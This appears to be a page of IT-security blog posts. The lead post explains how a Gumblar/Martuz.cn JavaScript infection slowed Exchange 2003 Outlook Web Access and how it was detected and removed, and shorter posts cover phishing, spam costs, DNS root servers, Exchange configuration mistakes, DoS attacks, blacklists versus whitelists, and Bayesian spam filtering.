Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slow after login and how to fix this problem.
Martuz.cn / Gumblar Exploit root cause of the OWA problem
Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days one of our main Exchange 2003 Server Outlook Web Access became painfully slow. Symptoms were related to main browser window in Internet Explorer displaying just the vertical bar that separates the folders and the message area and getting stuck there for about 30 seconds and then finally loading the rest of the page. Double clicking and opening a message would pop open the blank message window with a http://your servername…. In the lower left hand status bar of the pop up window and finally after about 30 seconds would load the window. Same thing would happen composing a new mail message in OWA. Everything worked normally accept that tasks became slower for users in OWA.
Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security which did not report any virus, Trojans, or spywares on the Exchange 2003 server. Looking further into the situation we noticed that when the browser window for the Outlook Web Access opened the task bar of the browser window would display http://yourservername…. and then would change to http://martuz.cn/vid/… for a few seconds and OWA window would finally open. This indicated some infection. Our analyses showed that OWA was running an infected java script within the OWA pages that caused the problem to appear. Apparently Symantec End Point Security on had no clue about this infection and we are still unsure about how server got infected. Googling and doing the research we have seen reports of PHP exploit or FTP exploit for the cause of the infection of the virus.
Martuz.cn JavaScript virus infection removal
First of all to see if you have the same problem as described here by logging into to the OWA account and watch at message on the bottom left side of the task bar of the browser window after the login which would say “Waiting for http://yourservername/exchange” if at any time it changes to waiting for http://martuz.cn… And then disappears you have the same problem.
Download and install the Microsoft Forefront Client Security trial version and install on the server, we left Symantec End Point Security running at the same time without any problem. Scan your entire Exchange installation folder only on your server for a quick check. If you see the message related to Gumblar Trojan then you server is infected. Infected files will be in \Exchsrvr\exchweb\controls and or D:\Exchsrvr\exchweb\6.5.7651.60 or something similar. Backup the entire exchweb folder just in case. Chose the option to remove the virus infected file. Re-install Exchange 2003 Service Pack which would re-populate the files removed by the anti-virus software.
Summary:
Martuz.cn / Gumblar is a JavaScript exploit that inserts itself into the legitimate OWA files. There is no definite known cause of how this virus gets installed on the server. Microsoft Forefront Security client seems to do a good job of detecting and removing the virus. You need to re-install service pack in order to re-introduce the files removed during the virus removal.
What is Phishing?
Phishing is a fraudulent act committed by individuals who want to gain access to sensitive personal information for an array of purposes. Contrary to what many believe one of the best ways you can protect yourself from phishing isn’t to install defense programs or increase security measures, but instead to learn how to recognize a phish.
The most common form of phishing requires the use of email. These emails usually appear to originate from a well organized financial establishment and ask for personal information that if placed in the wrong hands automatically puts you at great risk. A “legitimate” phish will most likely ask you at one point and time for your credit card number, social security number, account number or password. Many times phishing effort s seem to come from sites with which you do not even have an account with, giving you all the more evidence which will allow you to discover if indeed the email is a phishing attempt. It isn’t uncommon for a phishing email to instruct you to click on a link which will redirect you to a site where you’re expected to enter personal information. Authentic organizations should and will never ask you to confirm this information via email.
High Cost Effects of Spam on Businesses
What is Spam?
Spam can be generalized and defined as unsolicited emailing that’s usually sent out to several email addresses in bulk. Spam emailers have created their own “gated” community within the Internet; they’ve separated themselves from all politics and rules pertaining to the Internet and have constructed their own methods. This is being produced by all sorts of individuals and organizations in order to reach a wide set of audience, as they use this method to send endless amounts of emails and advertisements that flood your mailboxes on a daily basis.
Effects on Businesses
It isn’t a secret that many businesses heavily rely on the Internet, thus allowing them to grow and expand as time progresses. However if a business’s backbone is the Internet then in return bandwidth is the Internets back bone and support as well. When a message is sent to a network this action takes up bandwidth. Depending on the size of the message and the quantity depends on the amount of bandwidth utilized. A larger than usual message or mass quantities of messages will normally take up a great deal of bandwidth, which consequently will slow down a business’s network and Internet.
There have been studies that suspect spam for accounting as much as 50% of some businesses networks, this means that these businesses are only using about 50% of their resources, thus in return possibly hindering their growth and increasing unnecessary expenditure. It is a mission at times to reduce or even eliminate spam, however obtaining the right spam filter is the solution. Spam filters rely on a set of rules, regulations and if I may say so “politics” in order to catch and filter out the impractical emails. Determining your businesses needs and assessing the budget is one of the first steps in order to gain control of the unwanted emails. Read more »
DNS Root Name Servers Explained
A DNS Root Name server is a server that answers on behalf of the DNS root Zone, and redirects requirements for a given TLD (Top Level Domain) to that particular TLD’s name servers. The term “root name server” is normally used to describe the thirteen organizations often referred to as the “root server operators”. They implement the root namespace domain for the Internet’s official universal implementation of the Domain Name System. The original thirteen members in alphabetical order are; A - VeriSign Global Registry Services ,B - Information Sciences Institute ,C - Cogent Communications ,D - University of Maryland ,E - NASA Ames Research Center ,F - Internet Systems Consortium, Inc. ,G - U.S. DOD Network Information Center ,H - U.S. Army Research Lab ,I - Autonomica/NORDUnet ,J - VeriSign Global Registry Services ,K - RIPE NCC ,L - ICANN ,M - WIDE Project. Global
Incidentally, the letters A-M represent the 13 numeric IPv4 addresses at which the service is provided. Each operator is tasked with providing consistent DNS service to the Internet from their specific address.
The empty string after the final dot in a domain name is called the root domain, and all other domains like .org, .net, etc are enclosed within the root domain. A computer connected to the Internet resolves a domain name by asking every name server about the element to its left working its way from the right. The root name servers know which servers are responsible for the top-level domains like .com and .org, which have their own servers. These servers then query name servers responsible for particular domain names, which in turn answers queries for IP addresses of sub domains.
Common Mail Server Configuration Mistakes
1. Installation on Unsupported Hardware
Unless there is a very good reason not to, always install Exchange on hardware supported by Microsoft. Consult Microsoft’s Windows Server Catalog (formerly the “Hardware Compatibility List,” or HCL) for a complete list of compatible, supported hardware. In order for a system to be considered supported, it must be listed in the Windows Server Catalog. Systems containing some supported and some unsuported software are considered unsupported by Microsoft. In addition to ensuring a smoother installation or upgrade, using supported hardware also means you will receive better technical support from Microsoft or other vendors should the need arise in the future. Using unsupported hardware can cause problems ranging from intermittent mail outages to total and complete loss of data.
- Exchange Server 2008 requires both 64-bit hardware and 64-bit Windows. See “Exchange 2007: Frequently Asked Questions” for more information.
- Exchange Server 2003 cannot run on 64-bit Windows. See “Choosing Exchange Server 2003 Hardware for Reuse with Exchange Server 2007“ for recommendations from Microsoft on choosing the best hardware for Exchange.
- See “Microsoft support policy on hardware not in the Windows Catalog (Windows HCL)” (KB142865) for more information on Microsoft position on unsupported hardware.
2. Misconfigured DNS
Because Exchange relies heavily on both Active Directory and DNS, a simple configuration problem in either one will cause major headaches for your new or upgraded Exchange environment. Here are a few of the common configuration mistakes when it comes to DNS and your Exchange environment:
- All Windows 2000 Servers must be on Service Pack 3 or Windows Server 2003, including Global Catalogs (GCs). It is also Microsoft’s recommendation that at least one GC be placed in each site containing an Exchange mail server.
- Verify your Mail Exchanger (MX) records are correct and that no MX record points to the Fully Qualified Domain Name (FQDN) of an Exchange server. See “How to Verify that MX Records Do Not Point to the FQDN of an Exchange Server.”
- If it exists, remove the root zone under Forwarded Lookup Zones in the DNS management console, as it will prevent Exchange from sending mail (outbound mail). See “How To Remove the Root Zone (Dot Zone)“ (KB298148) and “‘Host Unknown’ message when sending outbound Internet mail” (KB289045) for information on removing the root (AKA “dot”) zone.
- See “Exchange Server 2003: Verifying DNS Design and Configuration“ for more information on verifying your DNS configuration.
What is DoS Denial of Service attack?
A denial of service (DoS) attack is an attempt to deny a user from accessing the available computer resources and services. It can be targeted towards a single system or a group of systems. In the event that a great number of systems are attacked, it’s called a distributed denial-of-service attack (DDoS).
Whereas the motives and means of carrying out the attacks are varied, the primary goal is to deny legitimate users from accessing information, resources and services.
A denial of service attack is typically carried out by an individual or group of individuals who deliberately prevent a computer system from functioning properly using various means. They usually target Internet Sites or services being hosted on reputable web servers. Common sites and services prone to attack are banks; DNS root name servers and online payment gateways.
Perpetrators of DoS attacks use various means and methods to carry out their acts. There are typically two means of attack, the wired and wireless means. Wired means of attacks are usually carried out on wired networks whereas the wireless means of attack is carried on wireless networks.
RBL Vs White List
RBL
RBL is an abbreviation for “Real-time Black List”. An RBL is a list of ‘known’ SMTP servers notorious for sending SPAM. The List is regularly updated with new potentially harmful entities. These entities might be a list of domain names, IP addresses and viruses that are known to cause or associated with potentially harmful activities. When the user receives a message, the email server can look at the IP address of the originating SMTP server, and search for it in a black list. If the IP address is found in the black list, traffic from that particular IP address it’s automatically blocked.
In the past, blacklist solutions come in the form of software. Traditionally, there existed only two major forms of software that used Real Time Black Lists: antivirus and anti-spyware software. However, new advanced blacklist solutions which use heuristics like the DNSBL (DNS Black List) have come up.
There are many advantages associated with using Real Black Lists; one major advantage of RBLs is that they don’t entail any major work from the user. You don’t need to have specialty training. Other advantages include; automatic update of the blacklist, total security against known threats, no need for definition file updates. It also acts as an extra layer of protection because it does not rely entirely on definition files.
However, there are some drawbacks associated with using Real Time Black Lists. Your network is left under the control of a third party vendor and constantly updating the list might consume a good chunk of the available bandwidth. A large email from a good source might be mistakenly deleted or blocked. The scanning of all incoming and outgoing IP traffic might slow down the system. Works stations and networks might be vulnerable to day-zero attacks.
White list
A white list is a list of accepted e-mail addresses or domain names/IP addresses that the user deems are acceptable to receive email from and should not be deleted. The most popular list is the e-mail white list. E-mail white lists contain a list of of e-mail addresses or domain names from which e-mail blocking software will allow traffic to be received. The white list is an option for those who don’t like using Real Time Black Lists.
There are many advantages associated with using a white list.The system performs faster because there is no constant scanning of outgoing or incoming traffic. You don’t need to install unlicensed software. No executable programs like spyware or Trojan horses will ever get installed on your system. There is also no need for virus or spyware definition updates; therefore, systems are constantly protected from day-zero virus attacks.
One drawback of using a white list is that you might miss an important message from a credible source that you have not included in the white list.
Bayesian Spam filters
The contents of emails that spammers have been sending within the past few years have been evolving with incredible craftiness. These emails seem to surpass simple-minded spam filters that we blatantly continuously install. We read spam, curse spam, and have come to hate spam, but what if there was an existing spam filter that evolved along with the endlessly developing spam, leaving it one step ahead every time?
What is the origin of Bayesian Spam Filters?
There was a man that lived from 1702 to 1761 who’s name was Thomas Bayes, an English Presbyterian minister and mathematician. After he died the Royal Society published one of his most important findings in 1763 as the Philosophical Transactions. His findings simply stated that if a deadly disease existed such as Cluvitis (non-existent) and the symptoms were fever, runny nose, toothache, and more, just because you manage to get a runny nose that doesn’t mean you have Cluvitis. However, if you were to acquire another series of symptoms at equal intervals such as a fever, then this would greatly increase the chances that you might have Cluvitis.
Spam - Small Business
Dealing Effectively with Spam
Any business that believes spam is merely an annoyance in the office is sadly mistaking. A 2007 report by Nucleus Research shows that spam costs organizations in the United States $712 per employee every year. According to Nucleus, that adds up to an estimated $70 billion annually in lost productivity. The amount of time employees spend going through their inbox trying to distinguish junk mail from messages that require a response is invaluable time that could be spent handling more important tasks. Not only that, the flood of email that seems to grow larger has the power to tax the corporate network by gobbling up disk storage, bandwidth and other precious resources. Trying to manage all the extra emails and find a solution to the problem could also have a tremendous impact, particularly on a small business.
Things are grim, and while it looks as if spam is here to stay, there are a few ways you can minimize the affect it has on your business.
Spam Filter Blacklists and Whitelists
In order to be effective at distinguishing spam from legitimate emails, a spam filter needs to rely on various methods. Some of today’s most popular programs utilize blacklists and whitelists to filter out junk mail. As you’ve probably guessed, these counterparts are the exact opposite of one another. Senders listed on the blacklist are denied access to a particular email address while those on the whitelists are allowed. When combined with techniques such as Bayesian filtering and pattern matching, these lists better assure that a much lower volume of spam reaches your inbox.
Types of Blacklists
Whitelists are pretty dry and cut, but blacklists come in many different forms. Below are details one some of the most common types of blacklists:
IP Blockers: IP blacklists or blackhole lists, are huge repositories of IP addresses known for distributing spam. The organizations who manage these repositories use a variety of mechanisms to find out who is sending spam. These techniques range from human reporting to setting up decoy email accounts. Many spam filters are configured to examine incoming email and trace its origin. If it comes from an IP address of a known spammer, it is flagged accordingly and moved to a quarantine folder. IP addresses can be blocked by email server, local machine or an entire country.
